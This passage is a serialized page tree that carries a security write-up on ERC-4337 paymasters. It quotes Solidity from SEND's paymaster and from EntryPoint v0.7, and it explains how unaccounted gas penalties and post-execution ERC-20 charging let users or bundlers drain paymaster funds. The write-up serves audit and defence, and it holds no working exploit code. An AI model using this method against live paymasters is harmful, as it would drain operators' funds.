baseFee);\n",{"type":25,"tag":216,"props":108305,"children":108306},{"class":6922,"line":105535},[108307],{"type":25,"tag":216,"props":108308,"children":108309},{"style":6964},[108310],{"type":31,"value":62852},{"type":25,"tag":216,"props":108312,"children":108313},{"class":6922,"line":105543},[108314],{"type":25,"tag":216,"props":108315,"children":108316},{"emptyLinePlaceholder":16},[108317],{"type":31,"value":7642},{"type":25,"tag":216,"props":108319,"children":108320},{"class":6922,"line":105551},[108321,108326,108331],{"type":25,"tag":216,"props":108322,"children":108323},{"style":6973},[108324],{"type":31,"value":108325},"            emit",{"type":25,"tag":216,"props":108327,"children":108328},{"style":7047},[108329],{"type":31,"value":108330}," UserOperationSponsored",{"type":25,"tag":216,"props":108332,"children":108333},{"style":6964},[108334],{"type":31,"value":108335},"(userOpSender, actualTokenNeeded, actualGasCost, cachedPriceWithMarkup, baseFee);\n",{"type":25,"tag":216,"props":108337,"children":108338},{"class":6922,"line":105559},[108339,108344],{"type":25,"tag":216,"props":108340,"children":108341},{"style":7047},[108342],{"type":31,"value":108343},"            refillEntryPointDeposit",{"type":25,"tag":216,"props":108345,"children":108346},{"style":6964},[108347],{"type":31,"value":108348},"(_cachedPrice);\n",{"type":25,"tag":216,"props":108350,"children":108351},{"class":6922,"line":105587},[108352],{"type":25,"tag":216,"props":108353,"children":108354},{"style":6964},[108355],{"type":31,"value":7302},{"type":25,"tag":216,"props":108357,"children":108359},{"class":6922,"line":108358},67,[108360],{"type":25,"tag":216,"props":108361,"children":108362},{"style":6964},[108363],{"type":31,"value":7311},{"type":25,"tag":216,"props":108365,"children":108367},{"class":6922,"line":108366},68,[108368],{"type":25,"tag":216,"props":108369,"children":108370},{"style":6964},[108371],{"type":31,"value":7874},{"type":25,"tag":38,"props":108373,"children":108374},{},[108375,108377,108383,108385,108390,108392,108398],{"type":31,"value":108376},"Looking at the code above, during ",{"type":25,"tag":82,"props":108378,"children":108380},{"className":108379},[],[108381],{"type":31,"value":108382},"validatePaymasterUserOp",{"type":31,"value":108384},", the paymaster attempts to charge a maximum prefund amount first. This prefund is calculated by taking the gas limit specified in the ",{"type":25,"tag":82,"props":108386,"children":108388},{"className":108387},[],[108389],{"type":31,"value":106441},{"type":31,"value":108391}," and applying a markup price to convert the native ETH cost into the equivalent ERC20-token value. Later in ",{"type":25,"tag":82,"props":108393,"children":108395},{"className":108394},[],[108396],{"type":31,"value":108397},"postOp",{"type":31,"value":108399},", the paymaster calculates the actual charge and refunds any excess from the prefund.",{"type":25,"tag":38,"props":108401,"children":108402},{},[108403,108405,108410,108412,108419],{"type":31,"value":108404},"However, there is a critical oversight: ",{"type":25,"tag":9273,"props":108406,"children":108407},{},[108408],{"type":31,"value":108409},"the code does not account for gas penalties",{"type":31,"value":108411},". The actual gas charged to the paymaster includes not just the gas used, but also any ",{"type":25,"tag":162,"props":108413,"children":108416},{"href":108414,"rel":108415},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.7/contracts/core/EntryPoint.sol#L726-L730",[166],[108417],{"type":31,"value":108418},"penalties incurred",{"type":31,"value":108420}," from differences between the execution gas limit and actual execution gas.",{"type":25,"tag":38,"props":108422,"children":108423},{},[108424],{"type":31,"value":108425},"This vulnerability can be exploited by malicious users who set an artificially high gas limit to trigger the penalty. When penalties are applied, the paymaster will be charged significantly more than expected, potentially draining its funds since these additional costs were not factored into the calculation.",{"type":25,"tag":38,"props":108427,"children":108428},{},[108429,108431,108436],{"type":31,"value":108430},"In fact, the bundler will be the one who receives the penalty paid by the paymaster. This means a bundler could submit their own ",{"type":25,"tag":82,"props":108432,"children":108434},{"className":108433},[],[108435],{"type":31,"value":106140},{"type":31,"value":108437}," to be executed by themselves and profit if the penalty they can extract from the paymaster exceeds their own gas costs paid to the paymaster. In SEND's case, fortunately, because they operate their own bundler, any penalties incurred flow back to their controlled bundler, creating a closed economic loop that mitigates this particular attack vector.",{"type":25,"tag":26,"props":108439,"children":108441},{"id":108440},"incorrect-erc-20-handling",[108442],{"type":25,"tag":9273,"props":108443,"children":108444},{},[108445],{"type":31,"value":108446},"Incorrect ERC-20 Handling",{"type":25,"tag":38,"props":108448,"children":108449},{},[108450],{"type":31,"value":108451},"To improve user experience, some protocols introduced ERC-20 paymasters that allow users to pay transaction gas fees using ERC-20 tokens instead of native ETH (Just like what SEND did in the above code). The core concept is quite straightforward, the paymaster fronts the ETH gas costs to bundlers, then charges users an equivalent amount in ERC-20 tokens based on current market rates. However, implementing this token-to-ETH conversion and payment flow securely requires careful consideration.",{"type":25,"tag":38,"props":108453,"children":108454},{},[108455,108456,108461,108463,108468],{"type":31,"value":49264},{"type":25,"tag":82,"props":108457,"children":108459},{"className":108458},[],[108460],{"type":31,"value":106221},{"type":31,"value":108462}," flow above, we can see that paymasters have two key interaction points during a ",{"type":25,"tag":82,"props":108464,"children":108466},{"className":108465},[],[108467],{"type":31,"value":106140},{"type":31,"value":108469},"'s lifecycle:",{"type":25,"tag":6711,"props":108471,"children":108472},{},[108473,108483],{"type":25,"tag":2043,"props":108474,"children":108475},{},[108476,108478],{"type":31,"value":108477},"During validation via ",{"type":25,"tag":82,"props":108479,"children":108481},{"className":108480},[],[108482],{"type":31,"value":106328},{"type":25,"tag":2043,"props":108484,"children":108485},{},[108486,108488],{"type":31,"value":108487},"After execution via ",{"type":25,"tag":82,"props":108489,"children":108491},{"className":108490},[],[108492],{"type":31,"value":106339},{"type":25,"tag":38,"props":108494,"children":108495},{},[108496],{"type":31,"value":108497},"This dual-interaction model has led to two predominant patterns for handling ERC-20 payments in paymaster implementations:",{"type":25,"tag":606,"props":108499,"children":108501},{"id":108500},"_1-pre-payment-with-refund-pattern",[108502],{"type":31,"value":108503},"1. Pre-Payment with Refund Pattern",{"type":25,"tag":38,"props":108505,"children":108506},{},[108507,108509,108514,108516,108521,108523,108529,108530,108536,108538,108543,108545,108550,108552,108557],{"type":31,"value":108508},"In this model, the paymaster requires users to pre-pay the maximum possible gas cost in ERC-20 tokens during ",{"type":25,"tag":82,"props":108510,"children":108512},{"className":108511},[],[108513],{"type":31,"value":106328},{"type":31,"value":108515},". After execution completes, ",{"type":25,"tag":82,"props":108517,"children":108519},{"className":108518},[],[108520],{"type":31,"value":106339},{"type":31,"value":108522}," refunds any excess tokens based on actual gas consumed. This is analogous to how regular ETH gas payments work. Several protocols like ",{"type":25,"tag":82,"props":108524,"children":108526},{"className":108525},[],[108527],{"type":31,"value":108528},"SEND",{"type":31,"value":1307},{"type":25,"tag":82,"props":108531,"children":108533},{"className":108532},[],[108534],{"type":31,"value":108535},"Circle",{"type":31,"value":108537}," have implemented this approach. However, this pattern has one key disadvantage: users must first approve the paymaster to spend their ERC20 tokens before submitting any ",{"type":25,"tag":82,"props":108539,"children":108541},{"className":108540},[],[108542],{"type":31,"value":106169},{"type":31,"value":108544},". This additional setup step is required to ensure the paymaster can successfully deduct tokens ",{"type":25,"tag":9273,"props":108546,"children":108547},{},[108548],{"type":31,"value":108549},"before",{"type":31,"value":108551}," execution (specifically during ",{"type":25,"tag":82,"props":108553,"children":108555},{"className":108554},[],[108556],{"type":31,"value":108382},{"type":31,"value":24702},{"type":25,"tag":606,"props":108559,"children":108561},{"id":108560},"_2-post-execution-charging-pattern",[108562],{"type":31,"value":108563},"2. Post-Execution Charging Pattern",{"type":25,"tag":38,"props":108565,"children":108566},{},[108567,108569,108574,108576,108581,108583,108588,108590,108595],{"type":31,"value":108568},"This alternative approach defers token collection until after execution. Instead of charging a prefund during ",{"type":25,"tag":82,"props":108570,"children":108572},{"className":108571},[],[108573],{"type":31,"value":106328},{"type":31,"value":108575},", the actual token payment is calculated and collected in ",{"type":25,"tag":82,"props":108577,"children":108579},{"className":108578},[],[108580],{"type":31,"value":106339},{"type":31,"value":108582}," based on the exact gas consumed. At first glance, this appears to be the most user-friendly pattern since users can bundle their token approval transaction within the same ",{"type":25,"tag":82,"props":108584,"children":108586},{"className":108585},[],[108587],{"type":31,"value":106140},{"type":31,"value":108589},", eliminating the need for a separate pre-approval transaction before submitting the ",{"type":25,"tag":82,"props":108591,"children":108593},{"className":108592},[],[108594],{"type":31,"value":106441},{"type":31,"value":108596},". This means users could interact with the paymaster without any prior setup.",{"type":25,"tag":38,"props":108598,"children":108599},{},[108600,108602,108607,108609,108615,108617,108623,108625,108630],{"type":31,"value":108601},"This approach used to work in ",{"type":25,"tag":82,"props":108603,"children":108605},{"className":108604},[],[108606],{"type":31,"value":106221},{"type":31,"value":108608}," version ",{"type":25,"tag":82,"props":108610,"children":108612},{"className":108611},[],[108613],{"type":31,"value":108614},"v0.6",{"type":31,"value":108616},", but the pattern no longer works in ",{"type":25,"tag":82,"props":108618,"children":108620},{"className":108619},[],[108621],{"type":31,"value":108622},"v0.7",{"type":31,"value":108624},". In fact, using this pattern can lead to loss of funds for the paymaster. Let's take a closer look at how ",{"type":25,"tag":82,"props":108626,"children":108628},{"className":108627},[],[108629],{"type":31,"value":108622},{"type":31,"value":108631}," handles the execution phase:",{"type":25,"tag":206,"props":108633,"children":108635},{"className":8423,"code":108634,"language":8422,"meta":7,"style":7},"    function _executeUserOp(\n        uint256 opIndex,\n        PackedUserOperation calldata userOp,\n        UserOpInfo memory opInfo\n    )\n    internal virtual\n    returns (uint256 collected) {\n    [...]\n        bool success;\n        {\n    [...]\n            if (methodSig == IAccountExecute.executeUserOp.selector) {\n                bytes memory executeUserOp = abi.encodeCall(IAccountExecute.executeUserOp, (userOp, opInfo.userOpHash));\n                innerCall = abi.encodeCall(this.innerHandleOp, (executeUserOp, opInfo, context));\n            } else\n            {\n                innerCall = abi.encodeCall(this.innerHandleOp, (callData, opInfo, context));\n            }\n            assembly (\"memory-safe\") {\n                success := call(gas(), address(), 0, add(innerCall, 0x20), mload(innerCall), 0, 32)\n                collected := mload(0)\n            }\n            _restoreFreePtr(saveFreePtr);\n        }\n        if (!success) {\n    [...]\n            if (innerRevertCode == INNER_OUT_OF_GAS) {\n                // handleOps was called with gas limit too low. abort entire bundle.\n                // can only be caused by bundler (leaving not enough gas for inner call)\n                revert FailedOp(opIndex, \"AA95 out of gas\");\n            } else if (innerRevertCode == INNER_REVERT_LOW_PREFUND) {\n                // innerCall reverted on prefund too low. treat entire prefund as \"gas cost\"\n                uint256 actualGas = preGas - gasleft() + opInfo.preOpGas;\n                uint256 actualGasCost = opInfo.prefund;\n                _emitPrefundTooLow(opInfo);\n                _emitUserOperationEvent(opInfo, false, actualGasCost, actualGas);\n                collected = actualGasCost;\n            } else {\n    [...]\n                collected = _postExecution(\n                    IPaymaster.PostOpMode.postOpReverted,\n                    opInfo,\n                    context,\n                    actualGas\n                );\n            }\n        }\n    }\n",[108636],{"type":25,"tag":82,"props":108637,"children":108638},{"__ignoreMap":7},[108639,108655,108671,108691,108708,108715,108728,108752,108760,108773,108780,108787,108808,108847,108884,108896,108903,108939,108946,108967,109056,109085,109092,109105,109112,109132,109139,109160,109168,109176,109203,109231,109239,109282,109302,109315,109337,109353,109368,109375,109395,109403,109411,109419,109427,109435,109442,109449],{"type":25,"tag":216,"props":108640,"children":108641},{"class":6922,"line":6923},[108642,108646,108651],{"type":25,"tag":216,"props":108643,"children":108644},{"style":6936},[108645],{"type":31,"value":93802},{"type":25,"tag":216,"props":108647,"children":108648},{"style":7047},[108649],{"type":31,"value":108650}," _executeUserOp",{"type":25,"tag":216,"props":108652,"children":108653},{"style":6964},[108654],{"type":31,"value":7420},{"type":25,"tag":216,"props":108656,"children":108657},{"class":6922,"line":6769},[108658,108662,108667],{"type":25,"tag":216,"props":108659,"children":108660},{"style":7375},[108661],{"type":31,"value":93980},{"type":25,"tag":216,"props":108663,"children":108664},{"style":6947},[108665],{"type":31,"value":108666}," opIndex",{"type":25,"tag":216,"props":108668,"children":108669},{"style":6964},[108670],{"type":31,"value":7465},{"type":25,"tag":216,"props":108672,"children":108673},{"class":6922,"line":6778},[108674,108679,108683,108687],{"type":25,"tag":216,"props":108675,"children":108676},{"style":6936},[108677],{"type":31,"value":108678},"        PackedUserOperation",{"type":25,"tag":216,"props":108680,"children":108681},{"style":6936},[108682],{"type":31,"value":106970},{"type":25,"tag":216,"props":108684,"children":108685},{"style":6947},[108686],{"type":31,"value":106975},{"type":25,"tag":216,"props":108688,"children":108689},{"style":6964},[108690],{"type":31,"value":7465},{"type":25,"tag":216,"props":108692,"children":108693},{"class":6922,"line":7005},[108694,108699,108703],{"type":25,"tag":216,"props":108695,"children":108696},{"style":6936},[108697],{"type":31,"value":108698},"        UserOpInfo",{"type":25,"tag":216,"props":108700,"children":108701},{"style":6936},[108702],{"type":31,"value":107038},{"type":25,"tag":216,"props":108704,"children":108705},{"style":6947},[108706],{"type":31,"value":108707}," opInfo\n",{"type":25,"tag":216,"props":108709,"children":108710},{"class":6922,"line":7110},[108711],{"type":25,"tag":216,"props":108712,"children":108713},{"style":6964},[108714],{"type":31,"value":27876},{"type":25,"tag":216,"props":108716,"children":108717},{"class":6922,"line":7216},[108718,108723],{"type":25,"tag":216,"props":108719,"children":108720},{"style":6936},[108721],{"type":31,"value":108722},"    internal",{"type":25,"tag":216,"props":108724,"children":108725},{"style":6936},[108726],{"type":31,"value":108727}," virtual\n",{"type":25,"tag":216,"props":108729,"children":108730},{"class":6922,"line":7244},[108731,108735,108739,108743,108748],{"type":25,"tag":216,"props":108732,"children":108733},{"style":6973},[108734],{"type":31,"value":50477},{"type":25,"tag":216,"props":108736,"children":108737},{"style":6964},[108738],{"type":31,"value":7016},{"type":25,"tag":216,"props":108740,"children":108741},{"style":7375},[108742],{"type":31,"value":50136},{"type":25,"tag":216,"props":108744,"children":108745},{"style":6947},[108746],{"type":31,"value":108747}," collected",{"type":25,"tag":216,"props":108749,"children":108750},{"style":6964},[108751],{"type":31,"value":18761},{"type":25,"tag":216,"props":108753,"children":108754},{"class":6922,"line":7257},[108755],{"type":25,"tag":216,"props":108756,"children":108757},{"style":6964},[108758],{"type":31,"value":108759},"    [...]\n",{"type":25,"tag":216,"props":108761,"children":108762},{"class":6922,"line":7275},[108763,108768],{"type":25,"tag":216,"props":108764,"children":108765},{"style":7375},[108766],{"type":31,"value":108767},"        bool",{"type":25,"tag":216,"props":108769,"children":108770},{"style":6964},[108771],{"type":31,"value":108772}," success;\n",{"type":25,"tag":216,"props":108774,"children":108775},{"class":6922,"line":7296},[108776],{"type":25,"tag":216,"props":108777,"children":108778},{"style":6964},[108779],{"type":31,"value":35621},{"type":25,"tag":216,"props":108781,"children":108782},{"class":6922,"line":7305},[108783],{"type":25,"tag":216,"props":108784,"children":108785},{"style":6964},[108786],{"type":31,"value":108759},{"type":25,"tag":216,"props":108788,"children":108789},{"class":6922,"line":7557},[108790,108794,108799,108803],{"type":25,"tag":216,"props":108791,"children":108792},{"style":6973},[108793],{"type":31,"value":62768},{"type":25,"tag":216,"props":108795,"children":108796},{"style":6964},[108797],{"type":31,"value":108798}," (methodSig ",{"type":25,"tag":216,"props":108800,"children":108801},{"style":6953},[108802],{"type":31,"value":12528},{"type":25,"tag":216,"props":108804,"children":108805},{"style":6964},[108806],{"type":31,"value":108807}," IAccountExecute.executeUserOp.selector) {\n",{"type":25,"tag":216,"props":108809,"children":108810},{"class":6922,"line":7574},[108811,108816,108820,108825,108829,108833,108837,108842],{"type":25,"tag":216,"props":108812,"children":108813},{"style":7375},[108814],{"type":31,"value":108815},"                bytes",{"type":25,"tag":216,"props":108817,"children":108818},{"style":6936},[108819],{"type":31,"value":107038},{"type":25,"tag":216,"props":108821,"children":108822},{"style":6964},[108823],{"type":31,"value":108824}," executeUserOp ",{"type":25,"tag":216,"props":108826,"children":108827},{"style":6953},[108828],{"type":31,"value":266},{"type":25,"tag":216,"props":108830,"children":108831},{"style":6936},[108832],{"type":31,"value":107635},{"type":25,"tag":216,"props":108834,"children":108835},{"style":6964},[108836],{"type":31,"value":179},{"type":25,"tag":216,"props":108838,"children":108839},{"style":7047},[108840],{"type":31,"value":108841},"encodeCall",{"type":25,"tag":216,"props":108843,"children":108844},{"style":6964},[108845],{"type":31,"value":108846},"(IAccountExecute.executeUserOp, (userOp, opInfo.userOpHash));\n",{"type":25,"tag":216,"props":108848,"children":108849},{"class":6922,"line":7591},[108850,108855,108859,108863,108867,108871,108875,108879],{"type":25,"tag":216,"props":108851,"children":108852},{"style":6964},[108853],{"type":31,"value":108854},"                innerCall ",{"type":25,"tag":216,"props":108856,"children":108857},{"style":6953},[108858],{"type":31,"value":266},{"type":25,"tag":216,"props":108860,"children":108861},{"style":6936},[108862],{"type":31,"value":107635},{"type":25,"tag":216,"props":108864,"children":108865},{"style":6964},[108866],{"type":31,"value":179},{"type":25,"tag":216,"props":108868,"children":108869},{"style":7047},[108870],{"type":31,"value":108841},{"type":25,"tag":216,"props":108872,"children":108873},{"style":6964},[108874],{"type":31,"value":1850},{"type":25,"tag":216,"props":108876,"children":108877},{"style":6936},[108878],{"type":31,"value":21651},{"type":25,"tag":216,"props":108880,"children":108881},{"style":6964},[108882],{"type":31,"value":108883},".innerHandleOp, (executeUserOp, opInfo, context));\n",{"type":25,"tag":216,"props":108885,"children":108886},{"class":6922,"line":7604},[108887,108891],{"type":25,"tag":216,"props":108888,"children":108889},{"style":6964},[108890],{"type":31,"value":74564},{"type":25,"tag":216,"props":108892,"children":108893},{"style":6973},[108894],{"type":31,"value":108895},"else\n",{"type":25,"tag":216,"props":108897,"children":108898},{"class":6922,"line":7613},[108899],{"type":25,"tag":216,"props":108900,"children":108901},{"style":6964},[108902],{"type":31,"value":35657},{"type":25,"tag":216,"props":108904,"children":108905},{"class":6922,"line":7636},[108906,108910,108914,108918,108922,108926,108930,108934],{"type":25,"tag":216,"props":108907,"children":108908},{"style":6964},[108909],{"type":31,"value":108854},{"type":25,"tag":216,"props":108911,"children":108912},{"style":6953},[108913],{"type":31,"value":266},{"type":25,"tag":216,"props":108915,"children":108916},{"style":6936},[108917],{"type":31,"value":107635},{"type":25,"tag":216,"props":108919,"children":108920},{"style":6964},[108921],{"type":31,"value":179},{"type":25,"tag":216,"props":108923,"children":108924},{"style":7047},[108925],{"type":31,"value":108841},{"type":25,"tag":216,"props":108927,"children":108928},{"style":6964},[108929],{"type":31,"value":1850},{"type":25,"tag":216,"props":108931,"children":108932},{"style":6936},[108933],{"type":31,"value":21651},{"type":25,"tag":216,"props":108935,"children":108936},{"style":6964},[108937],{"type":31,"value":108938},".innerHandleOp, (callData, opInfo, context));\n",{"type":25,"tag":216,"props":108940,"children":108941},{"class":6922,"line":7645},[108942],{"type":25,"tag":216,"props":108943,"children":108944},{"style":6964},[108945],{"type":31,"value":62852},{"type":25,"tag":216,"props":108947,"children":108948},{"class":6922,"line":7654},[108949,108954,108958,108963],{"type":25,"tag":216,"props":108950,"children":108951},{"style":7047},[108952],{"type":31,"value":108953},"            assembly",{"type":25,"tag":216,"props":108955,"children":108956},{"style":6964},[108957],{"type":31,"value":7016},{"type":25,"tag":216,"props":108959,"children":108960},{"style":8205},[108961],{"type":31,"value":108962},"\"memory-safe\"",{"type":25,"tag":216,"props":108964,"children":108965},{"style":6964},[108966],{"type":31,"value":18761},{"type":25,"tag":216,"props":108968,"children":108969},{"class":6922,"line":7722},[108970,108975,108979,108983,108987,108992,108996,109000,109004,109008,109012,109016,109021,109026,109030,109035,109040,109044,109048,109052],{"type":25,"tag":216,"props":108971,"children":108972},{"style":6964},[108973],{"type":31,"value":108974},"                success ",{"type":25,"tag":216,"props":108976,"children":108977},{"style":6953},[108978],{"type":31,"value":3008},{"type":25,"tag":216,"props":108980,"children":108981},{"style":7047},[108982],{"type":31,"value":44927},{"type":25,"tag":216,"props":108984,"children":108985},{"style":6964},[108986],{"type":31,"value":1850},{"type":25,"tag":216,"props":108988,"children":108989},{"style":7047},[108990],{"type":31,"value":108991},"gas",{"type":25,"tag":216,"props":108993,"children":108994},{"style":6964},[108995],{"type":31,"value":22334},{"type":25,"tag":216,"props":108997,"children":108998},{"style":7375},[108999],{"type":31,"value":36603},{"type":25,"tag":216,"props":109001,"children":109002},{"style":6964},[109003],{"type":31,"value":22334},{"type":25,"tag":216,"props":109005,"children":109006},{"style":6989},[109007],{"type":31,"value":1882},{"type":25,"tag":216,"props":109009,"children":109010},{"style":6964},[109011],{"type":31,"value":7026},{"type":25,"tag":216,"props":109013,"children":109014},{"style":7047},[109015],{"type":31,"value":13594},{"type":25,"tag":216,"props":109017,"children":109018},{"style":6964},[109019],{"type":31,"value":109020},"(innerCall, ",{"type":25,"tag":216,"props":109022,"children":109023},{"style":6989},[109024],{"type":31,"value":109025},"0x20",{"type":25,"tag":216,"props":109027,"children":109028},{"style":6964},[109029],{"type":31,"value":5406},{"type":25,"tag":216,"props":109031,"children":109032},{"style":7047},[109033],{"type":31,"value":109034},"mload",{"type":25,"tag":216,"props":109036,"children":109037},{"style":6964},[109038],{"type":31,"value":109039},"(innerCall), ",{"type":25,"tag":216,"props":109041,"children":109042},{"style":6989},[109043],{"type":31,"value":1882},{"type":25,"tag":216,"props":109045,"children":109046},{"style":6964},[109047],{"type":31,"value":7026},{"type":25,"tag":216,"props":109049,"children":109050},{"style":6989},[109051],{"type":31,"value":64314},{"type":25,"tag":216,"props":109053,"children":109054},{"style":6964},[109055],{"type":31,"value":7107},{"type":25,"tag":216,"props":109057,"children":109058},{"class":6922,"line":7730},[109059,109064,109068,109073,109077,109081],{"type":25,"tag":216,"props":109060,"children":109061},{"style":6964},[109062],{"type":31,"value":109063},"                collected ",{"type":25,"tag":216,"props":109065,"children":109066},{"style":6953},[109067],{"type":31,"value":3008},{"type":25,"tag":216,"props":109069,"children":109070},{"style":7047},[109071],{"type":31,"value":109072}," mload",{"type":25,"tag":216,"props":109074,"children":109075},{"style":6964},[109076],{"type":31,"value":1850},{"type":25,"tag":216,"props":109078,"children":109079},{"style":6989},[109080],{"type":31,"value":1882},{"type":25,"tag":216,"props":109082,"children":109083},{"style":6964},[109084],{"type":31,"value":7107},{"type":25,"tag":216,"props":109086,"children":109087},{"class":6922,"line":7760},[109088],{"type":25,"tag":216,"props":109089,"children":109090},{"style":6964},[109091],{"type":31,"value":62852},{"type":25,"tag":216,"props":109093,"children":109094},{"class":6922,"line":7768},[109095,109100],{"type":25,"tag":216,"props":109096,"children":109097},{"style":7047},[109098],{"type":31,"value":109099},"            _restoreFreePtr",{"type":25,"tag":216,"props":109101,"children":109102},{"style":6964},[109103],{"type":31,"value":109104},"(saveFreePtr);\n",{"type":25,"tag":216,"props":109106,"children":109107},{"class":6922,"line":7800},[109108],{"type":25,"tag":216,"props":109109,"children":109110},{"style":6964},[109111],{"type":31,"value":7302},{"type":25,"tag":216,"props":109113,"children":109114},{"class":6922,"line":7808},[109115,109119,109123,109127],{"type":25,"tag":216,"props":109116,"children":109117},{"style":6973},[109118],{"type":31,"value":7222},{"type":25,"tag":216,"props":109120,"children":109121},{"style":6964},[109122],{"type":31,"value":7016},{"type":25,"tag":216,"props":109124,"children":109125},{"style":6953},[109126],{"type":31,"value":24581},{"type":25,"tag":216,"props":109128,"children":109129},{"style":6964},[109130],{"type":31,"value":109131},"success) {\n",{"type":25,"tag":216,"props":109133,"children":109134},{"class":6922,"line":7868},[109135],{"type":25,"tag":216,"props":109136,"children":109137},{"style":6964},[109138],{"type":31,"value":108759},{"type":25,"tag":216,"props":109140,"children":109141},{"class":6922,"line":13001},[109142,109146,109151,109155],{"type":25,"tag":216,"props":109143,"children":109144},{"style":6973},[109145],{"type":31,"value":62768},{"type":25,"tag":216,"props":109147,"children":109148},{"style":6964},[109149],{"type":31,"value":109150}," (innerRevertCode ",{"type":25,"tag":216,"props":109152,"children":109153},{"style":6953},[109154],{"type":31,"value":12528},{"type":25,"tag":216,"props":109156,"children":109157},{"style":6964},[109158],{"type":31,"value":109159}," INNER_OUT_OF_GAS) {\n",{"type":25,"tag":216,"props":109161,"children":109162},{"class":6922,"line":13019},[109163],{"type":25,"tag":216,"props":109164,"children":109165},{"style":6927},[109166],{"type":31,"value":109167},"                // handleOps was called with gas limit too low. abort entire bundle.\n",{"type":25,"tag":216,"props":109169,"children":109170},{"class":6922,"line":13064},[109171],{"type":25,"tag":216,"props":109172,"children":109173},{"style":6927},[109174],{"type":31,"value":109175},"                // can only be caused by bundler (leaving not enough gas for inner call)\n",{"type":25,"tag":216,"props":109177,"children":109178},{"class":6922,"line":13170},[109179,109184,109189,109194,109199],{"type":25,"tag":216,"props":109180,"children":109181},{"style":6973},[109182],{"type":31,"value":109183},"                revert",{"type":25,"tag":216,"props":109185,"children":109186},{"style":7047},[109187],{"type":31,"value":109188}," FailedOp",{"type":25,"tag":216,"props":109190,"children":109191},{"style":6964},[109192],{"type":31,"value":109193},"(opIndex, ",{"type":25,"tag":216,"props":109195,"children":109196},{"style":8205},[109197],{"type":31,"value":109198},"\"AA95 out of gas\"",{"type":25,"tag":216,"props":109200,"children":109201},{"style":6964},[109202],{"type":31,"value":7797},{"type":25,"tag":216,"props":109204,"children":109205},{"class":6922,"line":27455},[109206,109210,109214,109218,109222,109226],{"type":25,"tag":216,"props":109207,"children":109208},{"style":6964},[109209],{"type":31,"value":74564},{"type":25,"tag":216,"props":109211,"children":109212},{"style":6973},[109213],{"type":31,"value":7268},{"type":25,"tag":216,"props":109215,"children":109216},{"style":6973},[109217],{"type":31,"value":19746},{"type":25,"tag":216,"props":109219,"children":109220},{"style":6964},[109221],{"type":31,"value":109150},{"type":25,"tag":216,"props":109223,"children":109224},{"style":6953},[109225],{"type":31,"value":12528},{"type":25,"tag":216,"props":109227,"children":109228},{"style":6964},[109229],{"type":31,"value":109230}," INNER_REVERT_LOW_PREFUND) {\n",{"type":25,"tag":216,"props":109232,"children":109233},{"class":6922,"line":27490},[109234],{"type":25,"tag":216,"props":109235,"children":109236},{"style":6927},[109237],{"type":31,"value":109238},"                // innerCall reverted on prefund too low. treat entire prefund as \"gas cost\"\n",{"type":25,"tag":216,"props":109240,"children":109241},{"class":6922,"line":27498},[109242,109246,109251,109255,109260,109264,109269,109273,109277],{"type":25,"tag":216,"props":109243,"children":109244},{"style":7375},[109245],{"type":31,"value":107418},{"type":25,"tag":216,"props":109247,"children":109248},{"style":6964},[109249],{"type":31,"value":109250}," actualGas ",{"type":25,"tag":216,"props":109252,"children":109253},{"style":6953},[109254],{"type":31,"value":266},{"type":25,"tag":216,"props":109256,"children":109257},{"style":6964},[109258],{"type":31,"value":109259}," preGas ",{"type":25,"tag":216,"props":109261,"children":109262},{"style":6953},[109263],{"type":31,"value":8276},{"type":25,"tag":216,"props":109265,"children":109266},{"style":6936},[109267],{"type":31,"value":109268}," gasleft",{"type":25,"tag":216,"props":109270,"children":109271},{"style":6964},[109272],{"type":31,"value":18000},{"type":25,"tag":216,"props":109274,"children":109275},{"style":6953},[109276],{"type":31,"value":3539},{"type":25,"tag":216,"props":109278,"children":109279},{"style":6964},[109280],{"type":31,"value":109281}," opInfo.preOpGas;\n",{"type":25,"tag":216,"props":109283,"children":109284},{"class":6922,"line":27506},[109285,109289,109293,109297],{"type":25,"tag":216,"props":109286,"children":109287},{"style":7375},[109288],{"type":31,"value":107418},{"type":25,"tag":216,"props":109290,"children":109291},{"style":6964},[109292],{"type":31,"value":108065},{"type":25,"tag":216,"props":109294,"children":109295},{"style":6953},[109296],{"type":31,"value":266},{"type":25,"tag":216,"props":109298,"children":109299},{"style":6964},[109300],{"type":31,"value":109301}," opInfo.prefund;\n",{"type":25,"tag":216,"props":109303,"children":109304},{"class":6922,"line":27515},[109305,109310],{"type":25,"tag":216,"props":109306,"children":109307},{"style":7047},[109308],{"type":31,"value":109309},"                _emitPrefundTooLow",{"type":25,"tag":216,"props":109311,"children":109312},{"style":6964},[109313],{"type":31,"value":109314},"(opInfo);\n",{"type":25,"tag":216,"props":109316,"children":109317},{"class":6922,"line":27557},[109318,109323,109328,109332],{"type":25,"tag":216,"props":109319,"children":109320},{"style":7047},[109321],{"type":31,"value":109322},"                _emitUserOperationEvent",{"type":25,"tag":216,"props":109324,"children":109325},{"style":6964},[109326],{"type":31,"value":109327},"(opInfo, ",{"type":25,"tag":216,"props":109329,"children":109330},{"style":6936},[109331],{"type":31,"value":12127},{"type":25,"tag":216,"props":109333,"children":109334},{"style":6964},[109335],{"type":31,"value":109336},", actualGasCost, actualGas);\n",{"type":25,"tag":216,"props":109338,"children":109339},{"class":6922,"line":27590},[109340,109344,109348],{"type":25,"tag":216,"props":109341,"children":109342},{"style":6964},[109343],{"type":31,"value":109063},{"type":25,"tag":216,"props":109345,"children":109346},{"style":6953},[109347],{"type":31,"value":266},{"type":25,"tag":216,"props":109349,"children":109350},{"style":6964},[109351],{"type":31,"value":109352}," actualGasCost;\n",{"type":25,"tag":216,"props":109354,"children":109355},{"class":6922,"line":27598},[109356,109360,109364],{"type":25,"tag":216,"props":109357,"children":109358},{"style":6964},[109359],{"type":31,"value":74564},{"type":25,"tag":216,"props":109361,"children":109362},{"style":6973},[109363],{"type":31,"value":7268},{"type":25,"tag":216,"props":109365,"children":109366},{"style":6964},[109367],{"type":31,"value":7241},{"type":25,"tag":216,"props":109369,"children":109370},{"class":6922,"line":27606},[109371],{"type":25,"tag":216,"props":109372,"children":109373},{"style":6964},[109374],{"type":31,"value":108759},{"type":25,"tag":216,"props":109376,"children":109377},{"class":6922,"line":27615},[109378,109382,109386,109391],{"type":25,"tag":216,"props":109379,"children":109380},{"style":6964},[109381],{"type":31,"value":109063},{"type":25,"tag":216,"props":109383,"children":109384},{"style":6953},[109385],{"type":31,"value":266},{"type":25,"tag":216,"props":109387,"children":109388},{"style":7047},[109389],{"type":31,"value":109390}," 